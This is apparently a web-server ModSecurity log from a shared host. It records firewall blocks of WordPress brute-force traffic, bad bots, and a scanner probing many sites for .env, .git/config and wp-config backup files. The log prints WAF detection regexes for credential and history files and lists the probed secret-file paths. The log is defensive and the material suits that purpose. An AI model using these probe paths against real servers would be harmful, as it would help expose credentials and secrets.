[Tue May 26 14:29:33.168023 2026] [security2:error] [pid 610693:tid 610876] [client 1.20.206.162:36878] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg9TvNO3hpmlY6M8Rr_wAAADU"]
[Tue May 26 14:29:33.315725 2026] [security2:error] [pid 610693:tid 610946] [client 62.244.225.226:25834] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVg9TvNO3hpmlY6M8Rr_gAAAHs"]
[Tue May 26 14:29:34.639993 2026] [security2:error] [pid 610693:tid 610930] [client 1.20.206.162:37634] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg9jvNO3hpmlY6M8RsHwAAAGs"]
[Tue May 26 14:29:34.660944 2026] [security2:error] [pid 606909:tid 607143] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg9l0yRtX9qA7aVUVwoQAAAO0"]
[Tue May 26 14:29:34.680496 2026] [security2:error] [pid 610693:tid 610930] [client 1.20.206.162:37634] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg9jvNO3hpmlY6M8RsHwAAAGs"]
[Tue May 26 14:29:36.132947 2026] [security2:error] [pid 610693:tid 610900] [client 1.20.206.162:38402] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg-DvNO3hpmlY6M8RsNgAAAE0"]
[Tue May 26 14:29:36.178811 2026] [security2:error] [pid 610693:tid 610900] [client 1.20.206.162:38402] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg-DvNO3hpmlY6M8RsNgAAAE0"]
[Tue May 26 14:29:36.812143 2026] [security2:error] [pid 610693:tid 610910] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg-DvNO3hpmlY6M8RsPQAAAFc"]
[Tue May 26 14:29:37.162611 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:53939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg-TvNO3hpmlY6M8RsSAAAAH4"]
[Tue May 26 14:29:37.162742 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:53939] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg-TvNO3hpmlY6M8RsSAAAAH4"]
[Tue May 26 14:29:38.149595 2026] [security2:error] [pid 610693:tid 610826] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg-TvNO3hpmlY6M8RsUgAAAAM"]
[Tue May 26 14:29:40.949692 2026] [security2:error] [pid 606909:tid 607099] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg_F0yRtX9qA7aVUVw9wAAAME"]
[Tue May 26 14:29:42.378413 2026] [security2:error] [pid 606909:tid 607068] [client 202.76.141.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg_V0yRtX9qA7aVUVxBgAAAKI"]
[Tue May 26 14:29:42.919752 2026] [security2:error] [pid 606909:tid 607058] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg_l0yRtX9qA7aVUVxDwAAAJg"]
[Tue May 26 14:29:43.021116 2026] [security2:error] [pid 606909:tid 607079] [client 167.71.198.58:55681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.198.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/xmlrpc.php"] [unique_id "ahVg_l0yRtX9qA7aVUVxFAAAAK0"], referer: https://shapeacademy.pl//blog//wp-login.php
[Tue May 26 14:29:43.225208 2026] [security2:error] [pid 606909:tid 607097] [client 23.21.212.31:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVg_10yRtX9qA7aVUVxHAAAAL8"]
[Tue May 26 14:29:43.225759 2026] [security2:error] [pid 606909:tid 607070] [client 23.21.212.31:19054] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVg_10yRtX9qA7aVUVxGgAAAKQ"]
[Tue May 26 14:29:43.435806 2026] [security2:error] [pid 606909:tid 607143] [client 23.21.212.31:47428] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVg_10yRtX9qA7aVUVxIgAAAO0"]
[Tue May 26 14:29:45.112113 2026] [security2:error] [pid 606909:tid 607132] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhAF0yRtX9qA7aVUVxMwAAAOI"]
[Tue May 26 14:29:46.097929 2026] [security2:error] [pid 610693:tid 610918] [client 167.71.198.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahVhATvNO3hpmlY6M8RsrAAAAF8"], referer: https://shapeacademy.pl//blog//wp-login.php
[Tue May 26 14:29:47.388876 2026] [security2:error] [pid 606909:tid 607040] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhAl0yRtX9qA7aVUVxSgAAAIY"]
[Tue May 26 14:29:47.580057 2026] [security2:error] [pid 610693:tid 610944] [client 202.141.83.254:5635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswQAAAHk"]
[Tue May 26 14:29:47.580158 2026] [security2:error] [pid 610693:tid 610944] [client 202.141.83.254:5635] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswQAAAHk"]
[Tue May 26 14:29:47.633239 2026] [security2:error] [pid 610693:tid 610833] [client 1.20.206.162:44099] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswwAAAAo"]
[Tue May 26 14:29:47.730423 2026] [security2:error] [pid 610693:tid 610833] [client 1.20.206.162:44099] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswwAAAAo"]
[Tue May 26 14:29:47.730491 2026] [security2:error] [pid 610693:tid 610833] [client 1.20.206.162:44099] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswwAAAAo"]
[Tue May 26 14:29:49.180208 2026] [security2:error] [pid 610693:tid 610864] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhBDvNO3hpmlY6M8Rs2gAAACk"]
[Tue May 26 14:29:49.675001 2026] [security2:error] [pid 610693:tid 610789] [remote 173.252.87.113:51042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 113.87.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVhBTvNO3hpmlY6M8Rs6AAAW18"]
[Tue May 26 14:29:50.393287 2026] [security2:error] [pid 610693:tid 610793] [remote 74.7.241.58:44238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVhBjvNO3hpmlY6M8Rs9wAASWM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 14:29:51.298395 2026] [security2:error] [pid 610693:tid 610903] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhBjvNO3hpmlY6M8Rs_wAAAFA"]
[Tue May 26 14:29:51.442529 2026] [security2:error] [pid 610693:tid 610841] [client 114.119.135.201:40311] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "aastha-enterprises.com"] [uri "/tracking.html"] [unique_id "ahVhBzvNO3hpmlY6M8RtAwAAABI"], referer: https://aastha-enterprises.com/
[Tue May 26 14:29:51.919896 2026] [security2:error] [pid 606909:tid 607005] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahVhB10yRtX9qA7aVUVxbwAAxV8"]
[Tue May 26 14:29:51.923171 2026] [security2:error] [pid 606909:tid 607005] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/*update.cgi*"] [unique_id "ahVhB10yRtX9qA7aVUVxcgAAxV8"]
[Tue May 26 14:29:51.924216 2026] [security2:error] [pid 606909:tid 606913] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backend/.env"] [unique_id "ahVhB10yRtX9qA7aVUVxdQAAxQM"]
[Tue May 26 14:29:52.068042 2026] [security2:error] [pid 606909:tid 606923] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahVhCF0yRtX9qA7aVUVxgAAAxQ0"]
[Tue May 26 14:29:52.068128 2026] [security2:error] [pid 606909:tid 607017] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.docker/.env"] [unique_id "ahVhCF0yRtX9qA7aVUVxfAAAxWs"]
[Tue May 26 14:29:52.069372 2026] [security2:error] [pid 606909:tid 606919] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVhCF0yRtX9qA7aVUVxgQAAxQk"]
[Tue May 26 14:29:52.075920 2026] [security2:error] [pid 606909:tid 606922] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.backup"] [unique_id "ahVhCF0yRtX9qA7aVUVxhQAAxQw"]
[Tue May 26 14:29:52.207558 2026] [security2:error] [pid 606909:tid 606927] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.bak"] [unique_id "ahVhCF0yRtX9qA7aVUVxhgAAxRE"]
[Tue May 26 14:29:52.219228 2026] [security2:error] [pid 606909:tid 606928] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.php"] [unique_id "ahVhCF0yRtX9qA7aVUVxkgAAxRI"]
[Tue May 26 14:29:52.220089 2026] [security2:error] [pid 606909:tid 606934] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.old"] [unique_id "ahVhCF0yRtX9qA7aVUVxkQAAxRg"]
[Tue May 26 14:29:52.365373 2026] [security2:error] [pid 606909:tid 607023] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.swp"] [unique_id "ahVhCF0yRtX9qA7aVUVxnAAAxXE"]
[Tue May 26 14:29:52.366531 2026] [security2:error] [pid 606909:tid 606950] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env~"] [unique_id "ahVhCF0yRtX9qA7aVUVxngAAxSg"]
[Tue May 26 14:29:52.501894 2026] [security2:error] [pid 606909:tid 607029] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config.bak"] [unique_id "ahVhCF0yRtX9qA7aVUVxqgAAxXc"]
[Tue May 26 14:29:52.511741 2026] [security2:error] [pid 606909:tid 607025] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config.old"] [unique_id "ahVhCF0yRtX9qA7aVUVxqwAAxXM"]
[Tue May 26 14:29:52.511741 2026] [security2:error] [pid 606909:tid 606958] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config~"] [unique_id "ahVhCF0yRtX9qA7aVUVxrAAAxTA"]
[Tue May 26 14:29:52.791878 2026] [security2:error] [pid 606909:tid 607076] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhCF0yRtX9qA7aVUVxpgAAAKo"]
[Tue May 26 14:29:53.292364 2026] [security2:error] [pid 606909:tid 606987] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVhCV0yRtX9qA7aVUVx5wAAkU0"]
[Tue May 26 14:29:53.299039 2026] [autoindex:error] [pid 606909:tid 606992] [remote 195.178.110.199:50950] AH01276: Cannot serve directory /home2/azurm42s/gestionbar.azurmediatec.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:29:53.307483 2026] [security2:error] [pid 606909:tid 606920] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/ADMIN/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx6gAAkQo"]
[Tue May 26 14:29:53.414561 2026] [security2:error] [pid 606909:tid 606994] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/API/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx9AAAuVQ"]
[Tue May 26 14:29:53.454487 2026] [security2:error] [pid 606909:tid 607015] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/APP/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx-gAA_Gk"]
[Tue May 26 14:29:53.455260 2026] [security2:error] [pid 606909:tid 607013] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Api/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx-wAA_Gc"]
